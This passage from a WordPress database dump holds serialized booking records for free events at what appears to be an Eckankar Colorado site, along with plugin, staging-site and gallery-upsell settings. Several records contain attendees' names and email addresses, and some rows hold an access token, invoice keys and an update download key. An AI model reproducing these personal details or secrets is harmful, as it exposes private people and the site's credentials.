Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1652005800:1652052600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1652005800;s:20:\"ticket_timestamp_end\";i:1652052600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438188,'BDC98943_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"sewgoodseed@gmail.com\";s:4:\"name\";s:8:\"Michele \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1652005800:1652052600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1652005800;s:20:\"ticket_timestamp_end\";i:1652052600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438189,'FBM20391_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1652005800:1652052600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1652005800;s:20:\"ticket_timestamp_end\";i:1652052600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438190,'JHY63353_cached','a:1:{i:0;a:24:{s:5:\"email\";s:17:\"acongem@gmail.com\";s:4:\"name\";s:21:\"Tony Olih Nwaokolobia\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1652005800:1652052600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1652005800;s:20:\"ticket_timestamp_end\";i:1652052600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438191,'YWK45796_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1652005800:1652052600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1652005800;s:20:\"ticket_timestamp_end\";i:1652052600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438192,'PSA29618_cached','a:1:{i:0;a:24:{s:5:\"email\";s:24:\"mugarugaandrew@gmail.com\";s:4:\"name\";s:6:\"Andre \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1651401000:1651447800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1651401000;s:20:\"ticket_timestamp_end\";i:1651447800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438193,'DGZ85409_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"teamskidmore@gmail.com\";s:4:\"name\";s:8:\"Shauncie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1651401000:1651447800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1651401000;s:20:\"ticket_timestamp_end\";i:1651447800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438194,'mec_transaction_version','6.10.5','yes'),(7438201,'external_updates-mec-fluent-layouts','O:8:\"stdClass\":5:{s:9:\"lastCheck\";i:1700584705;s:14:\"checkedVersion\";s:5:\"1.5.0\";s:6:\"update\";O:8:\"stdClass\":11:{s:4:\"slug\";s:18:\"mec-fluent-layouts\";s:7:\"version\";s:5:\"1.5.0\";s:12:\"download_url\";s:84:\"https://api.webnus.site/v3/updates/download.php?key=11f6f263422d291ed51dc50ca5999d4b\";s:12:\"translations\";a:0:{}s:2:\"id\";i:0;s:8:\"homepage\";s:42:\"https://webnus.net/modern-events-calendar/\";s:6:\"tested\";s:7:\"6.3.999\";s:12:\"requires_php\";s:5:\"5.6.0\";s:14:\"upgrade_notice\";N;s:5:\"icons\";a:1:{s:3:\"svg\";s:78:\"https://api.webnus.site/v3/updates/package-assets/icons/mec-fluent-layouts.svg\";}s:8:\"filename\";s:41:\"mec-fluent-layouts/mec-fluent-layouts.php\";}s:11:\"updateClass\";s:23:\"Puc_v4p11_Plugin_Update\";s:15:\"updateBaseClass\";s:13:\"Plugin_Update\";}','no'),(7438495,'mec_latest_event_datetime','20231121094923','no'),(7445067,'mec_cart_350173716','a:0:{}','no'),(7445070,'mec_latest_booking_datetime','20231112104633','no'),(7529107,'UHB34927','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268730\";s:19:\"translated_event_id\";s:6:\"268730\";s:4:\"date\";s:21:\"1694341800:1694345400\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1694341800:1694345400\";}s:10:\"booking_id\";i:269027;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"07afb4e0c8ee9afd4b831ee47f6478b4\";}','no'),(7445291,'mec_cart_551846634','a:0:{}','no'),(7540971,'wpstg_access_token','XjAccy0zk0UFx87kcjSzoOWObAO0y5AH3jSiC09s49CCOdPNex0KUTMcQuS74Iof','yes'),(7540974,'wpstg_free_backup_notice_dismissed','1','yes'),(7540977,'wpstg_analytics_notice_dismissed','1','no'),(7540978,'wpstg_analytics_has_consent','0','no'),(7540989,'wpstg_unique_identifier','rvI9eAtFHLZxKdQ7','yes'),(7540990,'wpstg_staging_sites','a:1:{i:1695317787736;a:25:{s:9:\"cloneName\";s:7:\"Staging\";s:13:\"directoryName\";s:7:\"staging\";s:4:\"path\";s:34:\"/home/eckank5/public_html/staging/\";s:3:\"url\";s:37:\"https://eckankar-colorado.org/staging\";s:6:\"number\";i:1;s:7:\"version\";s:5:\"3.0.4\";s:6:\"status\";s:8:\"finished\";s:6:\"prefix\";s:7:\"wpstg0_\";s:8:\"datetime\";i:1695317891;s:12:\"databaseUser\";s:0:\"\";s:16:\"databasePassword\";s:0:\"\";s:16:\"databaseDatabase\";s:0:\"\";s:14:\"databaseServer\";s:9:\"localhost\";s:14:\"databasePrefix\";s:0:\"\";s:11:\"databaseSsl\";b:0;s:12:\"cronDisabled\";b:0;s:13:\"emailsAllowed\";b:1;s:16:\"uploadsSymlinked\";b:0;s:7:\"ownerId\";i:2;s:14:\"includedTables\";a:96:{i:0;s:28:\"wpcl_actionscheduler_actions\";i:1;s:27:\"wpcl_actionscheduler_claims\";i:2;s:27:\"wpcl_actionscheduler_groups\";i:3;s:25:\"wpcl_actionscheduler_logs\";i:4;s:13:\"wpcl_cf_forms\";i:5;s:20:\"wpcl_cf_pro_messages\";i:6;s:22:\"wpcl_cf_queue_failures\";i:7;s:18:\"wpcl_cf_queue_jobs\";i:8;s:16:\"wpcl_commentmeta\";i:9;s:13:\"wpcl_comments\";i:10;s:25:\"wpcl_ff_scheduled_actions\";i:11;s:29:\"wpcl_fluentform_entry_details\";i:12;s:30:\"wpcl_fluentform_form_analytics\";i:13;s:25:\"wpcl_fluentform_form_meta\";i:14;s:21:\"wpcl_fluentform_forms\";i:15;s:20:\"wpcl_fluentform_logs\";i:16;s:31:\"wpcl_fluentform_submission_meta\";i:17;s:27:\"wpcl_fluentform_submissions\";i:18;s:18:\"wpcl_gg_attributes\";i:19;s:17:\"wpcl_gg_galleries\";i:20;s:27:\"wpcl_gg_galleries_resources\";i:21;s:14:\"wpcl_gg_photos\";i:22;s:21:\"wpcl_gg_settings_sets\";i:23;s:12:\"wpcl_gg_tags\";i:24;s:10:\"wpcl_links\";i:25;s:18:\"wpcl_mec_attendees\";i:26;s:26:\"wpcl_mec_booking_attendees\";i:27;s:17:\"wpcl_mec_bookings\";i:28;s:14:\"wpcl_mec_dates\";i:29;s:15:\"wpcl_mec_events\";i:30;s:20:\"wpcl_mec_occurrences\";i:31;s:14:\"wpcl_mec_users\";i:32;s:16:\"wpcl_ms_snippets\";i:33;s:20:\"wpcl_nf3_action_meta\";i:34;s:16:\"wpcl_nf3_actions\";i:35;s:15:\"wpcl_nf3_chunks\";i:36;s:19:\"wpcl_nf3_field_meta\";i:37;s:15:\"wpcl_nf3_fields\";i:38;s:18:\"wpcl_nf3_form_meta\";i:39;s:14:\"wpcl_nf3_forms\";i:40;s:20:\"wpcl_nf3_object_meta\";i:41;s:16:\"wpcl_nf3_objects\";i:42;s:22:\"wpcl_nf3_relationships\";i:43;s:17:\"wpcl_nf3_upgrades\";i:44;s:12:\"wpcl_options\";i:45;s:22:\"wpcl_plugin_notes_plus\";i:46;s:13:\"wpcl_postmeta\";i:47;s:10:\"wpcl_posts\";i:48;s:23:\"wpcl_rtec_registrations\";i:49;s:18:\"wpcl_sdm_downloads\";i:50;s:19:\"wpcl_simple_history\";i:51;s:28:\"wpcl_simple_history_contexts\";i:52;s:13:\"wpcl_snippets\";i:53;s:23:\"wpcl_term_relationships\";i:54;s:18:\"wpcl_term_taxonomy\";i:55;s:13:\"wpcl_termmeta\";i:56;s:10:\"wpcl_terms\";i:57;s:16:\"wpcl_tm_taskmeta\";i:58;s:13:\"wpcl_tm_tasks\";i:59;s:13:\"wpcl_usermeta\";i:60;s:10:\"wpcl_users\";i:61;s:19:\"wpcl_wfblockediplog\";i:62;s:14:\"wpcl_wfblocks7\";i:63;s:13:\"wpcl_wfconfig\";i:64;s:15:\"wpcl_wfcrawlers\";i:65;s:18:\"wpcl_wffilechanges\";i:66;s:15:\"wpcl_wffilemods\";i:67;s:11:\"wpcl_wfhits\";i:68;s:13:\"wpcl_wfhoover\";i:69;s:13:\"wpcl_wfissues\";i:70;s:20:\"wpcl_wfknownfilelist\";i:71;s:23:\"wpcl_wflivetraffichuman\";i:72;s:11:\"wpcl_wflocs\";i:73;s:13:\"wpcl_wflogins\";i:74;s:21:\"wpcl_wfls_2fa_secrets\";i:75;s:21:\"wpcl_wfls_role_counts\";i:76;s:18:\"wpcl_wfls_settings\";i:77;s:20:\"wpcl_wfnotifications\";i:78;s:20:\"wpcl_wfpendingissues\";i:79;s:19:\"wpcl_wfreversecache\";i:80;s:21:\"wpcl_wfsecurityevents\";i:81;s:16:\"wpcl_wfsnipcache\";i:82;s:13:\"wpcl_wfstatus\";i:83;s:19:\"wpcl_wftrafficrates\";i:84;s:18:\"wpcl_wfwaffailures\";i:85;s:22:\"wpcl_wonderplugin_tabs\";i:86;s:23:\"wpcl_wpforms_tasks_meta\";i:87;s:11:\"wpcl_wpgmza\";i:88;s:19:\"wpcl_wpgmza_circles\";i:89;s:16:\"wpcl_wpgmza_maps\";i:90;s:19:\"wpcl_wpgmza_polygon\";i:91;s:21:\"wpcl_wpgmza_polylines\";i:92;s:22:\"wpcl_wpgmza_rectangles\";i:93;s:28:\"wpcl_wpmailsmtp_debug_events\";i:94;s:26:\"wpcl_wpmailsmtp_tasks_meta\";i:95;s:21:\"wpcl_xsg_sitemap_meta\";}s:16:\"excludeSizeRules\";a:0:{}s:16:\"excludeGlobRules\";a:0:{}s:19:\"excludedDirectories\";a:4:{i:0;s:13:\"wpstg_c_cache\";i:1;s:19:\"wpstg_a_.well-known\";i:2;s:15:\"wpstg_a_cgi-bin\";i:3;s:17:\"wpstg_a_wordpress\";}s:16:\"extraDirectories\";a:1:{i:0;s:0:\"\";}s:12:\"networkClone\";b:0;}}','yes'),(7445488,'mec_cart_988683115','a:0:{}','no'),(7446289,'mec_cart_174463551','a:0:{}','no'),(7552942,'SOM97240','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269109\";s:19:\"translated_event_id\";s:6:\"269109\";s:4:\"date\";s:21:\"1696761000:1696764600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1696761000:1696764600\";}s:10:\"booking_id\";i:269157;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"a3c9bdbccd454e481dba64d9b3b64033\";}','no'),(7553248,'OSR63382','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:3:\"Tad\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269109\";s:19:\"translated_event_id\";s:6:\"269109\";s:4:\"date\";s:21:\"1696761000:1696764600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1696761000:1696764600\";}s:10:\"booking_id\";i:269163;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"36228bb858584ccf50dd6a91bacf5b0d\";}','no'),(7552944,'mec_cart_619817999','a:0:{}','no'),(7446683,'rsssl_last_tested_http_method','19','no'),(7446684,'rsssl_http_methods_allowed','a:2:{s:11:\"not-allowed\";a:0:{}s:7:\"allowed\";a:18:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";i:2;s:3:\"PUT\";i:3;s:6:\"DELETE\";i:4;s:4:\"HEAD\";i:5;s:7:\"OPTIONS\";i:6;s:7:\"CONNECT\";i:7;s:5:\"TRACE\";i:8;s:5:\"TRACK\";i:9;s:5:\"PATCH\";i:10;s:4:\"COPY\";i:11;s:4:\"LINK\";i:12;s:6:\"UNLINK\";i:13;s:5:\"PURGE\";i:14;s:4:\"LOCK\";i:15;s:6:\"UNLOCK\";i:16;s:8:\"PROPFIND\";i:17;s:4:\"VIEW\";}}','no'),(7555315,'FTM96030','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:14:\"Roger  Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269109\";s:19:\"translated_event_id\";s:6:\"269109\";s:4:\"date\";s:21:\"1696761000:1696764600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1696761000:1696764600\";}s:10:\"booking_id\";i:269169;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"92f31f18f1d371368ce8061677f14164\";}','no'),(7553278,'mec_cart_552741692','a:0:{}','no'),(7557869,'mec_cart_553482230','a:0:{}','no'),(7454511,'JEC45603','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:27:\"Gerald and Johanna van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268782;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"8804b9b1665d77e74a953b4784fcf946\";}','no'),(7594000,'_transient_timeout_modula_all_packages','1701967906','no'),(7594001,'_transient_modula_all_packages','a:1:{s:15:\"upsell_packages\";a:5:{s:37:\"modula-grid-gallery-business-lifetime\";a:6:{s:4:\"name\";s:41:\"Modula Grid Gallery - Business (lifetime)\";s:13:\"upgrade_price\";s:6:\"345.00\";s:4:\"slug\";s:37:\"modula-grid-gallery-business-lifetime\";s:7:\"excerpt\";s:26:\"Build the perfect gallery.\";s:2:\"id\";i:538961;s:10:\"extensions\";a:19:{s:6:\"modula\";a:3:{s:4:\"name\";s:10:\"Modula PRO\";s:11:\"description\";s:0:\"\";s:4:\"slug\";s:17:\"modula/Modula.php\";}s:12:\"modula-video\";a:3:{s:4:\"name\";s:5:\"Video\";s:11:\"description\";s:137:\"Adding a video gallery with both self-hosted videos and videos from sources like YouTube and Vimeo to your website has never been easier.\";s:4:\"slug\";s:29:\"modula-video/modula-video.php\";}s:14:\"modula-speedup\";a:3:{s:4:\"name\";s:7:\"SpeedUp\";s:11:\"description\";s:199:\"Allow Modula to automatically optimize your images to load as fast as possible by reducing their file sizes, resizing them through ShortPixel and serve them from StackPath\'s content delivery network.\";s:4:\"slug\";s:33:\"modula-speedup/modula-speedup.php\";}s:26:\"modula-advanced-shortcodes\";a:3:{s:4:\"name\";s:18:\"Advanced Shortcode\";s:11:\"description\";s:118:\"Allows you to dynamically link to specific galleries without creating pages for them by using URLs with query strings.\";s:4:\"slug\";s:57:\"modula-advanced-shortcodes/modula-advanced-shortcodes.php\";}s:17:\"modula-protection\";a:3:{s:4:\"name\";s:22:\"Right-Click Protection\";s:11:\"description\";s:199:\"The Modula Protection extension allows you to easily prevent your visitors from downloading your images with right-click protection. Use this extension to retain full ownership of your creative work.\";s:4:\"slug\";s:39:\"modula-protection/modula-protection.php\";}s:15:\"modula-deeplink\";a:3:{s:4:\"name\";s:12:\"SEO Deeplink\";s:11:\"description\";s:101:\"Full SEO control over your galleries. Create a unique and indexable URL for each Modula Gallery item.\";s:4:\"slug\";s:35:\"modula-deeplink/modula-deeplink.php\";}s:16:\"modula-watermark\";a:3:{s:4:\"name\";s:9:\"Watermark\";s:11:\"description\";s:101:\"Easily protect your photos by adding custom watermarks to your WordPress image galleries with Modula.\";s:4:\"slug\";s:37:\"modula-watermark/modula-watermark.php\";}s:23:\"modula-password-protect\";a:3:{s:4:\"name\";s:26:\"Password Protect Galleries\";s:11:\"description\";s:91:\"Password protect your galleries. This is a perfect solution for exclusive client galleries!\";s:4:\"slug\";s:51:\"modula-password-protect/modula-password-protect.php\";}s:16:\"modula-slideshow\";a:3:{s:4:\"name\";s:18:\"Lightbox Slideshow\";s:11:\"description\";s:98:\"Automatically turn your lightbox images into an auto-play slideshow. Play & pause between images. \";s:4:\"slug\";s:37:\"modula-slideshow/modula-slideshow.php\";}s:13:\"modula-slider\";a:3:{s:4:\"name\";s:25:\"Convert Gallery to Slider\";s:11:\"description\";s:116:\"Ever wanted to be able to create a gallery slider? One big image with thumbnail navigation below? We got it covered.\";s:4:\"slug\";s:31:\"modula-slider/modula-slider.php\";}s:13:\"modula-albums\";a:3:{s:4:\"name\";s:14:\"Gallery Albums\";s:11:\"description\";s:179:\"Give your galleries a place to call home with the Albums addon. Create albums, add galleries, manage cover photos, show gallery titles and even image counts in this superb add-on!\";s:4:\"slug\";s:31:\"modula-albums/modula-albums.php\";}s:11:\"modula-exif\";a:3:{s:4:\"name\";s:4:\"EXIF\";s:11:\"description\";s:88:\"The EXIF Addon for Modula allows you to edit & display EXIF metadata in your lightboxes.\";s:4:\"slug\";s:27:\"modula-exif/modula-exif.php\";}s:15:\"modula-download\";a:3:{s:4:\"name\";s:8:\"Download\";s:11:\"description\";s:103:\"Give your users the ability to download your images, galleries or albums with an easy to use shortcode.\";s:4:\"slug\";s:35:\"modula-download/modula-download.php\";}s:11:\"modula-zoom\";a:3:{s:4:\"name\";s:4:\"Zoom\";s:11:\"description\";s:90:\"Adds zoom functionality to images, when opened in the lightbox, to allow up close viewing.\";s:4:\"slug\";s:27:\"modula-zoom/modula-zoom.php\";}s:15:\"modula-defaults\";a:3:{s:4:\"name\";s:8:\"Defaults\";s:11:\"description\";s:245:\"Speed up your gallery creation process by starting from a pre-saved default. Save any gallery\'s settings as a default and reuse them indefinitely. Got a bunch of galleries you want to apply a default to? That\'s possible too with this extension. \";s:4:\"slug\";s:35:\"modula-defaults/modula-defaults.php\";}s:12:\"modula-roles\";a:3:{s:4:\"name\";s:15:\"Role Management\";s:11:\"description\";s:177:\"Granular control over which user roles can add, edit or update galleries on your website. Add permissions to an existing user role or remove them by simply checking a checkbox. \";s:4:\"slug\";s:29:\"modula-roles/modula-roles.php\";}s:17:\"modula-pagination\";a:3:{s:4:\"name\";s:10:\"Pagination\";s:11:\"description\";s:79:\"Modula Pagination allows you to display your gallery images in a paginated way.\";s:4:\"slug\";s:39:\"modula-pagination/modula-pagination.php\";}s:17:\"modula-whitelabel\";a:3:{s:4:\"name\";s:11:\"White Label\";s:11:\"description\";s:164:\"Want to use Modula but brand it with your own logo, external URLs and remove all mentions that aren\'t related to your brand? This extension helps you achieve this. \";s:4:\"slug\";s:39:\"modula-whitelabel/modula-whitelabel.php\";}s:17:\"modula-fullscreen\";a:3:{s:4:\"name\";s:10:\"Fullscreen\";s:11:\"description\";s:187:\"Delight your users with the possibility of showing images, inside the lightbox, in a full screen mode. Blow up your images as large as they can be with the native fullscreen browser mode.\";s:4:\"slug\";s:39:\"modula-fullscreen/modula-fullscreen.php\";}}}s:33:\"modula-grid-gallery-trio-lifetime\";a:6:{s:4:\"name\";s:37:\"Modula Grid Gallery - Trio (lifetime)\";s:13:\"upgrade_price\";s:6:\"240.00\";s:4:\"slug\";s:33:\"modula-grid-gallery-trio-lifetime\";s:7:\"excerpt\";s:39:\"Power users who need even more control.\";s:2:\"id\";i:538958;s:10:\"extensions\";a:10:{s:6:\"modula\";a:3:{s:4:\"name\";s:10:\"Modula PRO\";s:11:\"description\";s:0:\"\";s:4:\"slug\";s:17:\"modula/Modula.php\";}s:12:\"modula-video\";a:3:{s:4:\"name\";s:5:\"Video\";s:11:\"description\";s:137:\"Adding a video gallery with both self-hosted videos and videos from sources like YouTube and Vimeo to your website has never been easier.\";s:4:\"slug\";s:29:\"modula-video/modula-video.php\";}s:14:\"modula-speedup\";a:3:{s:4:\"name\";s:7:\"SpeedUp\";s:11:\"description\";s:199:\"Allow Modula to automatically optimize your images to load as fast as possible by reducing their file sizes, resizing them through ShortPixel and serve them from StackPath\'s content delivery network.\";s:4:\"slug\";s:33:\"modula-speedup/modula-speedup.php\";}s:26:\"modula-advanced-shortcodes\";a:3:{s:4:\"name\";s:18:\"Advanced Shortcode\";s:11:\"description\";s:118:\"Allows you to dynamically link to specific galleries without creating pages for them by using URLs with query 